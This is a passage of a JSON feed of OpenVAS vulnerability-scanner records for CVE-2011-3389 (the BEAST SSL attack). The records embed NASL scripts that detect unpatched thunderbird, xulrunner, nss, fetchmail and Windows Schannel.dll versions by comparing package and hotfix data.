"OPENVAS:863693", "href": "http://plugins.openvas.org/nasl.php?oid=863693", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"thunderbird on Fedora 15\";\ntag_insight = \"Mozilla Thunderbird is a standalone mail and newsgroup client.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072225.html\");\n script_id(863693);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:39 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for thunderbird FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of thunderbird\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird\", rpm:\"thunderbird~9.0~4.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:33", "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "cvss3": {}, "published": "2012-08-30T00:00:00", "type": "openvas", "title": "FreeBSD Ports: fetchmail", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-10-05T00:00:00", "id": "OPENVAS:136141256231071832", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071832", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_fetchmail16.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID 18ce9a90-f269-11e1-be53-080027ef73ec\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71832\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3389\");\n script_version(\"$Revision: 11762 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-30 11:34:17 -0400 (Thu, 30 Aug 2012)\");\n script_name(\"FreeBSD Ports: fetchmail\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following package is affected: fetchmail\n\nCVE-2011-3389\nThe SSL protocol, as used in certain configurations in Microsoft\nWindows and Microsoft Internet Explorer, Mozilla Firefox, Google\nChrome, Opera, and other products, encrypts data by using CBC mode\nwith chained initialization vectors, which allows man-in-the-middle\nattackers to obtain plaintext HTTP headers via a blockwise\nchosen-boundary attack (BCBA) on an HTTPS session, in conjunction with\nJavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java\nURLConnection API, or (3) the Silverlight WebClient API, aka a 'BEAST'\nattack.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"fetchmail\");\nif(!isnull(bver) && revcomp(a:bver, b:\"6.3.9\")>=0 && revcomp(a:bver, b:\"6.3.22\")<0) {\n txt += \"Package fetchmail version \" + bver + \" is installed which is known to be vulnerable.\\n\";\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:38", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird-lightning FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864037", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864037", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird-lightning FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071321.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864037\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:04:19 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n script_name(\"Fedora Update for thunderbird-lightning FEDORA-2011-17400\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'thunderbird-lightning'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"thunderbird-lightning on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird-lightning\", rpm:\"thunderbird-lightning~1.1~0.1.rc1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-01-08T14:03:20", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS12-006.", "cvss3": {}, "published": "2012-01-11T00:00:00", "type": "openvas", "title": "Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2020-01-07T00:00:00", "id": "OPENVAS:1361412562310902900", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902900", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902900\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(49778);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-01-11 09:47:46 +0530 (Wed, 11 Jan 2012)\");\n script_name(\"Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2585542\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this issue may allow attackers to perform limited\n man-in-the-middle attacks to inject data into the beginning of the application protocol stream to execute HTTP\n transactions, bypass authentication.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7 Service Pack 1 and prior\n\n - Microsoft Windows XP Service Pack 3 and prior\n\n - Microsoft Windows 2K3 Service Pack 2 and prior\n\n - Microsoft Windows Vista Service Pack 1/2 and prior\n\n - Microsoft Windows Server 2008 Service Pack 1/2 and prior\");\n\n script_tag(name:\"insight\", value:\"A flaw exists is due to an error in Microsoft Windows SChannel (Secure Channel),\n when modifying the way that the Windows Secure Channel (SChannel) component sends and receives encrypted network packets.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Microsoft Bulletin MS12-006.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:2, win2008:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nif(hotfix_check_sp(win2003:3) > 0)\n{\n if(hotfix_missing(name:\"2585542\") == 1)\n {\n sysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Schannel.dll\");\n if(sysVer)\n {\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4935\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n }\n else if(hotfix_missing(name:\"2638806\") == 1)\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n}\n\nif(hotfix_missing(name:\"2585542\") == 0){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Schannel.dll\");\nif(!sysVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6175\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP){\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_in_range(version:sysVer, test_version:\"6.0.6002.18000\", test_version2:\"6.0.6002.18540\")||\n version_in_range(version:sysVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.22741\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.7600.16915\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7600.21000\", test_version2:\"6.1.7600.21091\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7601.17000\", test_version2:\"6.1.7601.17724\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7601.21000\", test_version2:\"6.1.7601.21860\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:07:05", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS12-006.", "cvss3": {}, "published": "2012-01-11T00:00:00", "type": "openvas", "title": "Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:902900", "href": "http://plugins.openvas.org/nasl.php?oid=902900", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-006.nasl 8276 2018-01-03 12:29:18Z asteins $\n#\n# Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation of this issue may allow attackers to perform limited\n man-in-the-middle attacks to inject data into the beginning of the\n application protocol stream to execute HTTP transactions, bypass\n authentication.\n Impact Level: Windows\";\ntag_affected = \"Microsoft Windows 7 Service Pack 1 and prior.\n Microsoft Windows XP Service Pack 3 and prior.\n Microsoft Windows 2K3 Service Pack 2 and prior.\n Microsoft Windows Vista Service Pack 1/2 and prior.\n Microsoft Windows Server 2008 Service Pack 1/2 and prior.\";\ntag_insight = \"A flaw exists is due to an error in Microsoft Windows SChannel (Secure Channel),\n when modifying the way that the Windows Secure Channel (SChannel) component\n sends and receives encrypted network packets.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-006\";\ntag_summary = \"This host is missing an important security update according to\n Microsoft Bulletin MS12-006.\";\n\nif(description)\n{\n script_id(902900);\n script_version(\"$Revision: 8276 $\");\n script_cve_id(\"CVE-2011-3389\");\n script_bugtraq_id(49778);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 13:29:18 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-11 09:47:46 +0530 (Wed, 11 Jan 2012)\");\n script_name(\"Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2585542\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-006\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win7:2, win2008:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\n## Windows 2003\nif(hotfix_check_sp(win2003:3) > 0)\n{\n ## Check for Hotfix 2638806 (MS12-006)\n if(hotfix_missing(name:\"2585542\") == 1)\n {\n sysVer = fetch_file_version(sysPath, file_name:\"system32\\Schannel.dll\");\n if(sysVer)\n {\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Schannel.dll version < 5.2.3790.4935\n if(version_is_less(version:sysVer, test_version:\"5.2.3790.4935\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n }\n }\n else if(hotfix_missing(name:\"2638806\") == 1)\n {\n security_message(0);\n }\n exit(0);\n}\n\n## Check for Hotfix 2585542 (MS12-006)\nif(hotfix_missing(name:\"2585542\") == 0){\n exit(0);\n}\n\n## Get Version from file Schannel.dll\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Schannel.dll\");\nif(!sysVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Check for Schannel.dll version < 5.1.2600.6175\n if(version_is_less(version:sysVer, test_version:\"5.1.2600.6175\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n if(!SP){\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Schannel.dll version\n if(version_in_range(version:sysVer, test_version:\"6.0.6002.18000\", test_version2:\"6.0.6002.18540\")||\n version_in_range(version:sysVer, test_version:\"6.0.6002.22000\", test_version2:\"6.0.6002.22741\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Grep for Schannel.dll version\n if(version_is_less(version:sysVer, test_version:\"6.1.7600.16915\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7600.21000\", test_version2:\"6.1.7600.21091\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7601.17000\", test_version2:\"6.1.7601.17724\") ||\n version_in_range(version:sysVer, test_version:\"6.1.7601.21000\", test_version2:\"6.1.7601.21860\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:13", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for xulrunner FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310863960", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310863960", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071326.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863960\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:35 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n script_name(\"Fedora Update for xulrunner FEDORA-2011-17400\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xulrunner'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"xulrunner on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~9.0~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-08T12:56:16", "description": "Check for the Version of nss", "cvss3": {}, "published": "2012-03-19T00:00:00", "type": "openvas", "title": "Fedora Update for nss FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:863804", "href": "http://plugins.openvas.org/nasl.php?oid=863804", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss on Fedora 16\";\ntag_insight = \"Network Security Services (NSS) is a set of libraries designed to\n support cross-platform development of security-enabled client and\n server applications. Applications built with NSS can support SSL v2\n and v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509\n v3 certificates, and other security standards.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071325.html\");\n script_id(863804);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-19 12:18:59 +0530 (Mon, 19 Mar 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17400\");\n script_name(\"Fedora Update for nss FEDORA-2011-17400\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss\", rpm:\"nss~3.13.1~9.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:39:01", "description": "The remote host is missing an update to curl\nannounced via advisory DSA 2398-2.", 